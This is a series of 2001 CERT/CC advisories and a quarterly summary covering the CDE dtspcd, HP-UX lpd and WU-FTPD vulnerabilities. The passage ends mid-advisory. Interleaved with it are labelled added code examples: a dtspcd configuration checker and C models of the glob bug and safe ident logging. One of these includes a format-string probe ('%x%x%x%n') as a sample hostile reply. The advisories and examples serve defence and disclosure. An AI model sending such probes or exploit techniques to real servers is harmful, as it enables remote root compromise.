* http://www.kb.cert.org/vuls/id/388183
* http://www.kb.cert.org/vuls/id/722143
* http://www.kb.cert.org/vuls/id/466239
* http://www.kb.cert.org/vuls/id/39001
* http://www.kb.cert.org/vuls/id/30308
* http://www.kb.cert.org/vuls/id/966075
* http://www.kb.cert.org/vuls

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-30.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis.
Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History
November 05, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

Date: Mon, 12 Nov 2001 16:59:00 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control Service

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control Service

Original release date: November 12, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Systems running CDE

Overview

There is a remotely exploitable buffer overflow vulnerability in a library function used by the CDE Subprocess Control Service. This vulnerability could be used to crash the service or to execute arbitrary code with root privileges. This vulnerability is documented in VU#172583.

I. Description

The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. The CDE Subprocess Control Service (dtspcd) is a network daemon that accepts requests from clients to execute commands and launch applications remotely. On systems running CDE, dtspcd is spawned by the Internet services daemon (typically inetd or xinetd) in response to a CDE client request. dtspcd is typically configured to run on port 6112/tcp with root privileges. For more information about CDE, see

http://www.opengroup.org/cde/
http://www.opengroup.org/desktop/faq/

There is a remotely exploitable buffer overflow vulnerability in a shared library that is used by dtspcd. During client negotiation, dtspcd accepts a length value and subsequent data from the client without performing adequate input validation.
As a result, a malicious client can manipulate data sent to dtspcd and cause a buffer overflow, potentially executing code with root privileges.

The vulnerability was first reported to us in March 1999, and more recently by Internet Security Systems (ISS) X-Force. For more information, see

http://www.kb.cert.org/vuls/id/172583
http://xforce.iss.net/alerts/advise101.php

This vulnerability has been assigned the identifier CAN-2001-0803 by the Common Vulnerabilities and Exposures (CVE) group:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803

Many common UNIX systems ship with CDE installed and enabled by default. To determine if your system is configured to run dtspcd, check for the following entries:

/etc/services
dtspc 6112/tcp

/etc/inetd.conf
dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd

Any system that does not run the CDE Subprocess Control Service is not vulnerable to this problem.

II. Impact

An attacker can execute arbitrary code with root privileges.

III. Solution

Apply a patch

Appendix A contains information from vendors who have provided information for this advisory. We will update the appendix as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly.

Limit access to vulnerable service

Until patches are available and can be applied, you may wish to limit or block access to the Subprocess Control Service from untrusted networks such as the Internet. Using a firewall or other packet-filtering technology, block or restrict access to the port used by the Subprocess Control Service. As noted above, dtspcd is typically configured to listen on port 6112/tcp. It may be possible to use TCP Wrapper or a similar technology to provide improved access control and logging functionality for dtspcd connections. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from the internal network.
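The /etc/services and /etc/inetd.conf check described above, as an added example that is not the advisory's or any vendor's code: it parses both files, ignores commented-out entries, and reports whether dtspcd is served by inetd, on which port and as which user. The two file excerpts are constructed samples.

```python
"""Check whether the CDE Subprocess Control Service (dtspcd) is enabled via
inetd, following the entries CA-2001-31 says to look for.  Added example, not
CERT or vendor code; SERVICES and INETD_CONF are constructed samples."""
from typing import Dict, Iterator, List, Optional

SERVICES = """\
# service-name  port/protocol  [aliases]
printer         515/tcp        spooler
dtspc           6112/tcp
"""

INETD_CONF = """\
# service  type    proto  wait    user  server-program      args
ftp        stream  tcp    nowait  root  /usr/sbin/in.ftpd   in.ftpd
dtspc      stream  tcp    nowait  root  /usr/dt/bin/dtspcd  /usr/dt/bin/dtspcd
#printer   stream  tcp    nowait  root  /usr/sbin/in.lpd    in.lpd
"""


def _fields(text: str) -> Iterator[List[str]]:
    """Yield the whitespace-separated fields of each active (non-comment) line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # a leading '#' disables an entry
        if line:
            yield line.split()


def service_port(services_text: str, name: str, proto: str = "tcp") -> Optional[int]:
    """Port assigned to name/proto in /etc/services, or None if absent."""
    for f in _fields(services_text):
        if len(f) >= 2 and f[0] == name:
            port, _, p = f[1].partition("/")
            if p == proto and port.isdigit():
                return int(port)
    return None


def inetd_entry(inetd_text: str, name: str, proto: str = "tcp") -> Optional[Dict[str, str]]:
    """Active inetd.conf entry for name.  Field order in inetd.conf is:
    service, socket type, protocol, wait/nowait, user, server program, args."""
    for f in _fields(inetd_text):
        if len(f) >= 6 and f[0] == name and f[2] == proto:
            return {"user": f[4], "program": f[5]}
    return None


def dtspcd_exposure(services_text: str, inetd_text: str) -> Optional[Dict[str, object]]:
    """None when dtspcd is not served by inetd; otherwise the port it listens
    on (per /etc/services), the user it runs as, and the program path, so an
    administrator can see whether it is reachable and root-privileged."""
    entry = inetd_entry(inetd_text, "dtspc")
    if entry is None:
        return None
    return {"port": service_port(services_text, "dtspc"),
            "user": entry["user"], "program": entry["program"]}


def check_system(services_path: str = "/etc/services",
                 inetd_path: str = "/etc/inetd.conf") -> Optional[Dict[str, object]]:
    """Run the same check against the real files on this host."""
    with open(services_path) as s, open(inetd_path) as i:
        return dtspcd_exposure(s.read(), i.read())


if __name__ == "__main__":
    print(dtspcd_exposure(SERVICES, INETD_CONF))
```

Hosts that use xinetd keep per-service files under /etc/xinetd.d in a different syntax, which this parser does not read.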
It is important to understand your network configuration and service requirements before deciding what changes are appropriate.

TCP Wrapper is available from

ftp://ftp.porcupine.org/pub/security/index.html

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Caldera, Inc.

Caldera Open Unix and UnixWare are vulnerable. Caldera has released Security Advisory CSSA-2001-SCO.30:

ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/CSSA-2001-SCO.30.txt

Compaq Computer Corporation

Case ID SSRT0782U

Compaq has not been able to reproduce the problem identified in this advisory for any Compaq OS. However, with the information available, we are including a code change for Compaq's TRU64 UNIX that will further reduce any potential overflow vulnerability. This updated code will be announced when patches are available from the TRU64 UNIX FTP site and will be included in future releases of TRU64 UNIX.

The TRU64 UNIX FTP patch site is at:
http://ftp.support.compaq.com/public/dunix/

To subscribe to automatically receive future NEW Security Advisories from Compaq's Software Security Response Team via electronic mail, use your browser to select the URL:
http://www.support.compaq.com/patches/mailing-list.shtml

Select "Security and Individual Notices" for immediate dispatch notifications directly to your mailbox.

To report new Security Vulnerabilities, send mail to: security-ssrt@compaq.com

Cray Inc.

UNICOS, UNICOS/mk, and CrayTools are not vulnerable.

Fujitsu

Fujitsu's UXP/V operating system is not vulnerable because it does not support any CDE components.

Hewlett-Packard Company

The version of dtspcd supplied by HP has a buffer overflow. It is not clear whether this overflow can be exploited.
To be safe HP is generating patches to fix this overflow on the assumption that it might be exploitable.

IBM Corporation

IBM addressed a buffer overflow in CDE dtspcd in AIX 4.x around April 1999. See the following APARs for more information:

APAR IY06694:
http://techsupport.services.ibm.com/aix/fixes/v4/X11/X11.Dt.rte.4.3.3.10.info

APAR IX89419 (AIX 4.3.0):
http://www-1.ibm.com/servlet/support/manager?rs=0&rt=0&org=apars&doc=29B5A5858069D8A2852567C90039978E
http://techsupport.services.ibm.com/aix/fixes/v4/X11/X11.Dt.lib.4.3.2.5.info

APAR IX89893 (AIX 4.2.0):
http://www-1.ibm.com/servlet/support/manager?rs=0&rt=0&org=apars&doc=AAF008DAA07200B6852567CC0049B07D

APAR IX89806 (AIX V4.1 BOS):
http://www-1.ibm.com/servlet/support/manager?rs=0&rt=0&org=apars&doc=446F48D60A887FF0852567CA005C9920

The Open Group

The Open Group maintains source code for the Common Desktop Environment (CDE). The Open Group is investigating this issue, and source licensees of The Open Group's CDE product can contact desktop@opengroup.org for advice regarding this issue.

SGI

SGI acknowledges the CDE vulnerabilities reported by CERT and is currently investigating. No further information is available at this time.

For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list.

http://www.sgi.com/support/security/

Sun

The Sun dtspcd daemon is vulnerable to this buffer overflow.
Sun is generating patches to address this issue for all affected and supported versions of Solaris. Sun will be releasing a Sun Security Bulletin once the patches are officially released and publicly available.

The patches will be available from:
http://sunsolve.sun.com/securitypatch

Sun Security Bulletins are available from:
http://sunsolve.sun.com/security

Xi Graphics

We have not been able to confirm whether we are vulnerable to this exploit, however the potential for a buffer overrun is present. We will provide a patch on our FTP site for DeXtop during the week of [November] 12th that addresses this issue.

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/172583
2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803
3. http://xforce.iss.net/alerts/advise101.php
4. http://www.opengroup.org/cde/
5. http://www.opengroup.org/desktop/faq/

_________________________________________________________________

The CERT Coordination Center thanks Internet Security Systems (ISS) X-Force, who published an advisory on this issue.

_________________________________________________________________

Author: Art Manion

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-31.html

______________________________________________________________________

Copyright 2001 Carnegie Mellon University.
Revision History
November 12, 2001: initial release

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

Date: Tue, 20 Nov 2001 14:20:43 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Summary CS-2001-04

-----BEGIN PGP SIGNED MESSAGE-----

CERT Summary CS-2001-04

November 20, 2001

Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.

Past CERT summaries are available from:

CERT Summaries
http://www.cert.org/summaries/

______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in August 2001 (CS-2001-03), we have seen a new worm known as "Nimda," as well as active exploitation of a vulnerability in Microsoft DNS servers. In addition, we have published a paper on denial of service trends, issued a new PGP key, and updated the UNIX Security Checklist.

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.

CERT/CC Current Activity
http://www.cert.org/current/current_activity.html

1. W32/Nimda Worm

Over the past several months, we have received reports of malicious code known as the "W32/Nimda Worm." This worm can propagate itself via several methods, including email, network shares, or by visiting an infected web site.
On September 18, the CERT/CC issued an advisory on Nimda.

CERT Advisory CA-2001-26: Nimda Worm
http://www.cert.org/advisories/CA-2001-26.html

2. Exploitation of Vulnerability in SSH1 CRC-32 Compensation Attack Detector

The CERT/CC has received multiple reports of systems being compromised via the CRC-32 compensation attack detector vulnerability (VU#945216). On November 5, the CERT/CC released an incident note which describes system compromises via a vulnerability in the SSH1 (Secure Shell Protocol v1) CRC-32 attack detection code. Consequently, we are also receiving reports of increased scanning activity for the SSH service (22/tcp).

Incident Note IN-2001-12: Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector
http://www.cert.org/incident_notes/IN-2001-12.html

Vulnerability Note #945216: SSH CRC32 attack detection code contains remote integer overflow
http://www.kb.cert.org/vuls/id/945216

3. DNS Cache Poisoning in Microsoft DNS Servers

The CERT/CC has received reports from sites experiencing cache corruption on systems running Microsoft DNS Server. We issued an incident note which describes this corruption and its impact on systems. The default configuration of this software allows data from malicious or incorrectly configured DNS servers to be cached by a Microsoft DNS server. This corruption can result in erroneous DNS information being returned to clients which use this server.

Incident Note IN-2001-11: Cache Corruption on Microsoft DNS Servers
http://www.cert.org/incident_notes/IN-2001-11.html

Vulnerability Note #109475: Microsoft Windows NT and 2000 Domain Name Servers allow non-authoritative RRs to be cached by default
http://www.kb.cert.org/vuls/id/109475

4. Trends In Denial Of Service Attack Technology

This paper describes the current and possible future states of denial of service (DoS) technology. This document is in Adobe Acrobat format, and requires Acrobat Reader.
Trends In Denial Of Service Attack Technology
http://www.cert.org/archive/pdf/DoS_trends.pdf

______________________________________________________________________

UNIX Security Checklist Version 2.0

The CERT Coordination Center and the Australian Computer Emergency Response Team (AusCERT) have jointly published version 2.0 of the UNIX Security Checklist which details steps to improve the security of UNIX Operating Systems. We encourage system administrators to review all sections of this document and, if appropriate, modify their systems accordingly to fix potential weaknesses.

AUSCERT UNIX Security Checklist
http://www.cert.org/tech_tips/AUSCERT_checklist2.0.html

______________________________________________________________________

New CERT/CC PGP Key

On October 1, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.

CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc

Sending Sensitive Information To The CERT/CC
http://www.cert.org/contact_cert/encryptmail.html

______________________________________________________________________

What's New and Updated

Since the last CERT Summary, we have published new and updated

* Advisories
  http://www.cert.org/advisories/
* Congressional Testimony
  http://www.cert.org/congressional_testimony/
* Incident Notes
  http://www.cert.org/incident_notes/
* CERT/CC Statistics
  http://www.cert.org/stats/cert_stats.html
* Tech Tips
  http://www.cert.org/tech_tips/
* Training Schedule
  http://www.cert.org/training/
* UNIX Security Checklist v2.0
  http://www.cert.org/tech_tips/unix_security_checklist2.0.html

______________________________________________________________________

This document is available from:
http://www.cert.org/summaries/CS-2001-04.html

______________________________________________________________________

Copyright ©2001 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBO/qnUKCVPMXQI2HJAQFqJwP9Fdg7Z6LrdCAGgshO9zPojFjt/yV95bk8
dzt+RfWC/4sSuFipx1Db6c3UvBUwIMqW+JaryT21haHLWRatkgWGw/89hTsBfY5J
iEgPc+sRagEJ/w6gOas5N2B+4uNApXU9Fj0S0IgfaLulIfixtkfJkKUAHVjFxqAk
MRViE3BdE9A=
=OX1Z
-----END PGP SIGNATURE-----

From - Wed Nov 21 15:04:07 2001
Date: Wed, 21 Nov 2001 14:41:53 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-32 Buffer Overflow in HP-UX Line Printer Daemon

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-32 Buffer Overflow in HP-UX Line Printer Daemon

Original release date: November 21, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

HP9000 Servers running the following releases:
* HP-UX Version 10.01
* HP-UX Version 10.10
* HP-UX Version 10.20
* HP-UX Version 11.00
* HP-UX Version 11.11

Overview

The HP-UX line printer daemon (rlpdaemon) enables various clients to share printers over a network. A remotely exploitable buffer overflow vulnerability exists in the rlpdaemon.

I. Description

By sending a specially crafted print request to an HP-UX host running the rlpdaemon, a local or remote attacker can trigger the buffer overflow. Intruders may find this vulnerability attractive to exploit because the line printer daemon is enabled by default to provide printing services. Additionally, no previous knowledge of or access to the vulnerable system is required for exploitation.

Internet Security Systems (ISS) and Hewlett-Packard Company have issued the following announcements, respectively:

  Remote Logic Flaw Vulnerability in HP-UX Line Printer Daemon
  Hewlett-Packard Company Security Bulletin #0176

This vulnerability has been assigned the identifier CAN-2001-0817 by the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0817

For the latest and most detailed information about this vulnerability, please see VU#638011.

II. Impact

An attacker can execute arbitrary code on the target system with the privileges of the line printer daemon, typically superuser.

III. Solution

Install a patch from HP

More information is available in Appendix A.

Restrict access to the lpd service

As a general practice, we recommend disabling all services that are not explicitly required. You may wish to disable the line printer daemon until a patch can be applied. If you cannot disable the service, you can limit your exposure to this vulnerability by using a router or firewall to restrict access to port 515/TCP (printer). Note that this does not protect you against attackers from within your network.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Hewlett-Packard Company
  Please see Hewlett-Packard Company Security Bulletin #0176.

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/638011
2. http://xforce.iss.net/alerts/advise102.php
3. http://www.kb.cert.org/vuls/id/IAFY-54PKL4

_________________________________________________________________

This vulnerability was discovered and researched by Mark Dowd and Kris Hunt of Internet Security Systems (ISS). The CERT/CC thanks ISS for the information contained in their advisory.

_________________________________________________________________

Author: Ian A. Finlay.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-32.html

______________________________________________________________________
Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History
November 21, 2001: initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBO/v/ZaCVPMXQI2HJAQET4gP/e7X3trRSEzNeXBlE8TkMX0phGOCDe2xQ
ksuW+n6Idr+056a1ZqYbA9q8FG8qIRYCR51Hfl5OsX3NeztdjfMLylW+Xkf5sqn7
w0zmSzj2zXXEHyKz9Zzbfj544E86L2i+yJVjGrtrKyqYaWvJH5bXLWAzFFm3Qpme
698IC1jYn/k=
=k4Qj
-----END PGP SIGNATURE-----

From - Fri Nov 30 09:09:28 2001
Date: Thu, 29 Nov 2001 18:49:24 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-33 Multiple Vulnerabilities in WU-FTPD

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-33 Multiple Vulnerabilities in WU-FTPD

Original release date: November 29, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Systems running WU-FTPD and its derivatives

Overview

WU-FTPD is a widely deployed software package used to provide File Transfer Protocol (FTP) services on UNIX and Linux systems. There are two vulnerabilities in WU-FTPD that expose a system to potential remote root compromise by anyone with access to the FTP service. These vulnerabilities have recently received increased scrutiny.

I. Description

There are two remote code execution vulnerabilities in the Washington University FTP daemon (WU-FTPD). Both of these vulnerabilities have been discussed in public forums and have received widespread exposure.

VU#886083: WU-FTPD does not properly handle glob command

WU-FTPD features globbing capabilities that allow a user to specify multiple file names and locations using typical shell notation. See CERT Advisory CA-2001-07 for a more complete explanation of globbing. WU-FTPD implements its own globbing code instead of using libraries in the underlying operating system. When the globbing code is called, it allocates memory on the heap to store a list of file names that match the expanded glob expression. The globbing code is designed to recognize invalid syntax and return an error condition to the calling function.
However, when it encounters a specific string, the globbing code fails to properly return the error condition. The calling function therefore proceeds as if the glob syntax were correct and later frees memory through a pointer the globbing code never set, whose stale contents can be user-supplied data. If intruders can place addresses and shellcode in the right locations on the heap using FTP commands, they may be able to cause WU-FTPD to execute arbitrary code by later issuing a command that is mishandled by the globbing code.

This vulnerability is potentially exploitable by any user who is able to log in to a vulnerable server, including users with anonymous access. If the exploit is successful, an attacker may be able to execute arbitrary code with the privileges of WU-FTPD, typically root. If the exploit is unsuccessful, the process servicing the request will fail, but the WU-FTPD service will continue to run.

This vulnerability has been assigned the identifier CAN-2001-0550 by the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0550

CORE Security Technologies has published a Vulnerability Report on this issue:
http://www.corest.com/pressroom/advisories_desplegado.php?dxsection=10&idx=17

VU#639760: WU-FTPD configured to use RFC 931 authentication running in debug mode contains format string vulnerability

WU-FTPD can perform RFC 931 authentication when accepting inbound connections from clients. RFC 931 defines the Authentication Server Protocol, and is obsoleted by RFC 1413, which defines the Identification Protocol. RFC 931 is commonly known as "auth" or "authd", and RFC 1413 is commonly known as "ident" or "identd". Both are named after the daemon that commonly provides the service. When using RFC 931 authentication, WU-FTPD will request ident information before authorizing a connection request from a client.
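The error-path defect described above, modelled as an added C example (illustrative code written for this page, not WU-FTPD's ftpglob code): the expander below has one input for which it returns without setting the caller's status, and the instrumented caller reports whether it would have handed a never-assigned pointer to free(). The sentinel values, the unterminated-brace trigger and the function names are assumptions of the example; a real caller would simply crash or corrupt the heap at that point.

```c
/*
 * Added example, not WU-FTPD source: a model of the bug class behind
 * VU#886083. A glob expander has one input for which it returns without
 * reporting an error; the caller then trusts an uninitialized pointer.
 * Rather than free()ing garbage (undefined behaviour), the caller below
 * is instrumented to report whether it *would* have done so. The sentinel
 * values and the "unterminated brace" trigger are this example's own.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GLOB_OK        0
#define GLOB_BADSYNTAX 1

/* Stands in for stale stack/heap bytes the caller inherits; in the real
 * attack those bytes are attacker-influenced. */
#define STALE_PTR ((char **)(uintptr_t)0x41414141u)

static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *d = malloc(n);
    if (d) memcpy(d, s, n);
    return d;
}

static char **one_match(const char *pat)
{
    char **list = calloc(2, sizeof *list);   /* heap list: match + NULL */
    if (list) list[0] = dup_str(pat);
    return list;
}

/* Modelled defect: an unterminated "{" returns before *err and *out are
 * set. Every other path reports a status and a pointer. */
static void glob_expand_buggy(const char *pat, int *err, char ***out)
{
    if (strchr(pat, '{') && !strchr(pat, '}'))
        return;                               /* no error reported */
    if (pat[0] == '\0') { *err = GLOB_BADSYNTAX; *out = NULL; return; }
    *out = one_match(pat);
    *err = GLOB_OK;
}

/* Hardened expander: pessimistic defaults first, so no path can leave
 * the caller's variables untouched. */
static void glob_expand_fixed(const char *pat, int *err, char ***out)
{
    *err = GLOB_BADSYNTAX;
    *out = NULL;
    if (pat[0] == '\0') return;
    if (strchr(pat, '{') && !strchr(pat, '}')) return;
    *out = one_match(pat);
    *err = GLOB_OK;
}

static void free_list(char **list)
{
    for (size_t i = 0; list[i]; i++) free(list[i]);
    free(list);
}

typedef void (*glob_fn)(const char *, int *, char ***);

/* Mirrors the vulnerable caller: err and list still hold values from a
 * previous successful call, and list is freed whenever err reads GLOB_OK.
 * Returns 1 if free() would have been handed the stale pointer. */
static int caller_would_free_garbage(glob_fn expand, const char *pat)
{
    int err = GLOB_OK;            /* stale: previous call succeeded */
    char **list = STALE_PTR;      /* stale: never assigned by this call */

    expand(pat, &err, &list);
    if (err != GLOB_OK) return 0; /* error reported: nothing to free */
    if (list == STALE_PTR) return 1;
    if (list == NULL) return 0;   /* allocation failure, nothing to free */
    free_list(list);
    return 0;
}

int main(void)
{
    const char *pats[] = { "*.txt", "foo{", "" };
    for (size_t i = 0; i < 3; i++)
        printf("%-8s buggy=%d fixed=%d\n", pats[i],
               caller_would_free_garbage(glob_expand_buggy, pats[i]),
               caller_would_free_garbage(glob_expand_fixed, pats[i]));
    return 0;
}
```

The fix is in the shape of the expander, not in the caller: every return path writes both outputs, so a caller that forgets to initialise its locals is still safe. That is the property to check when auditing any function whose result is "a status plus an out-parameter".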
The auth or ident service running on the client returns user-specific information, allowing WU-FTPD to make authentication decisions based on data in the ident response. WU-FTPD can also be run in debugging mode, which provides detailed information about its operation.

When WU-FTPD is configured to perform RFC 931 authentication and is run in debug mode, it logs connection information using syslog(3) function calls. The logging code does not include format string specifiers in some syslog(3) calls, nor does the code perform adequate input validation on the contents of the identd response received from a client. In other words, the identd response is passed to syslog(3) as the format string itself rather than as an argument to a fixed format such as "%s". As a result, a crafted identd response containing user-supplied format string specifiers is interpreted by syslog(3), possibly overwriting arbitrary locations in memory. By carefully designing such a response, an attacker may execute arbitrary code with the privileges of WU-FTPD.

This vulnerability is potentially exploitable by any user who is able to log in to a vulnerable server, including users with anonymous access. The intruder must also be able to control the response to the ident request. If successful, an attacker may be able to execute arbitrary code with the privileges of WU-FTPD, typically root. Note that this vulnerability does not manifest unless WU-FTPD is configured to use RFC 931 authentication and is run in debug mode.

This vulnerability has been assigned the identifier CAN-2001-0187 by the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0187

II. Impact

Both of these vulnerabilities can be exploited remotely by any user with access to the FTP service, including anonymous access. Both vulnerabilities allow an intruder to execute arbitrary code with the privileges of WU-FTPD, typically root. An exploit attempt that does not succeed in executing code may crash WU-FTPD or end the connection used by the intruder.
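The fix pattern for the format string issue, as an added C example rather than WU-FTPD's code: the identd reply is parsed into fields and then logged through a literal format, so any "%" directives inside the reply are data. The field widths, the "hostile reply" heuristic and the sample replies are constructed for the example; the real daemon logs via syslog(3), for which snprintf stands in here so the output can be inspected.

```c
/*
 * Added example, not WU-FTPD source: the fix pattern for VU#639760.
 * An RFC 1413 reply is parsed into fields and logged through a fixed
 * format string, so "%" sequences inside the reply are data, never
 * directives. Field limits, the hostile-reply heuristic and the sample
 * replies are this example's assumptions.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct ident_reply {
    int  server_port;   /* port on the FTP server side of the connection */
    int  client_port;   /* port on the client side */
    char os[32];        /* opsys-field, e.g. "UNIX" */
    char user[64];      /* user-id field */
};

/* Copy [start,end) into dst with surrounding whitespace removed. */
static void trim_copy(char *dst, size_t cap, const char *start, const char *end)
{
    while (start < end && isspace((unsigned char)*start)) start++;
    while (end > start && isspace((unsigned char)end[-1])) end--;
    size_t n = (size_t)(end - start);
    if (n >= cap) n = cap - 1;
    memcpy(dst, start, n);
    dst[n] = '\0';
}

/* Parse "<sport> , <cport> : USERID : <opsys> : <user-id>".
 * Returns 1 on a well-formed USERID reply, 0 for ERROR or malformed input. */
static int parse_ident_reply(const char *line, struct ident_reply *r)
{
    const char *c1 = strchr(line, ':');
    const char *c2 = c1 ? strchr(c1 + 1, ':') : NULL;
    const char *c3 = c2 ? strchr(c2 + 1, ':') : NULL;
    char type[16];

    if (!c3) return 0;                                  /* ERROR replies land here */
    if (sscanf(line, "%d , %d", &r->server_port, &r->client_port) != 2) return 0;
    if (r->server_port < 1 || r->server_port > 65535 ||
        r->client_port < 1 || r->client_port > 65535) return 0;
    trim_copy(type, sizeof type, c1 + 1, c2);
    if (strcmp(type, "USERID") != 0) return 0;
    trim_copy(r->os, sizeof r->os, c2 + 1, c3);
    trim_copy(r->user, sizeof r->user, c3 + 1, c3 + 1 + strlen(c3 + 1));
    return r->user[0] != '\0';
}

/* Worth alerting on: a user-id carrying format directives or control
 * characters is not a name, it is a probe. */
static int ident_reply_looks_hostile(const struct ident_reply *r)
{
    for (const char *p = r->user; *p; p++)
        if (*p == '%' || iscntrl((unsigned char)*p)) return 1;
    return 0;
}

/* Vulnerable shape (never do this):  syslog(LOG_DEBUG, reply_line);
 * Fixed shape: the reply fields are arguments to a literal format. */
static int format_ident_log(char *out, size_t cap, const char *peer,
                            const struct ident_reply *r)
{
    return snprintf(out, cap, "ident from %s: user=%s os=%s ports=%d/%d",
                    peer, r->user, r->os, r->server_port, r->client_port);
}

/* Convenience checks used by the stand-alone run. */
static int ident_user_is(const char *line, const char *expect)
{
    struct ident_reply r;
    return parse_ident_reply(line, &r) && strcmp(r.user, expect) == 0;
}

static int ident_is_hostile(const char *line)
{
    struct ident_reply r;
    return parse_ident_reply(line, &r) && ident_reply_looks_hostile(&r);
}

static int ident_log_equals(const char *peer, const char *line, const char *expect)
{
    struct ident_reply r;
    char buf[256];
    if (!parse_ident_reply(line, &r)) return 0;
    format_ident_log(buf, sizeof buf, peer, &r);
    return strcmp(buf, expect) == 0;
}

/* Constructed sample replies; the peer address is from the documentation range. */
static const char benign_reply[]  = "6193, 23 : USERID : UNIX : stjohns";
static const char hostile_reply[] = "6193, 23 : USERID : UNIX : %x%x%x%n";
static const char error_reply[]   = "6193, 23 : ERROR : NO-USER";

int main(void)
{
    const char *replies[] = { benign_reply, hostile_reply, error_reply };
    for (int i = 0; i < 3; i++) {
        struct ident_reply r;
        char buf[256];
        if (!parse_ident_reply(replies[i], &r)) { printf("rejected: %s\n", replies[i]); continue; }
        format_ident_log(buf, sizeof buf, "192.0.2.10", &r);
        printf("%s%s\n", buf, ident_reply_looks_hostile(&r) ? "  [hostile]" : "");
    }
    return 0;
}
```

With the literal format in place the hostile reply is logged verbatim as "user=%x%x%x%n" and nothing is interpreted; the heuristic is there so that such attempts show up in monitoring rather than silently succeeding or failing.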
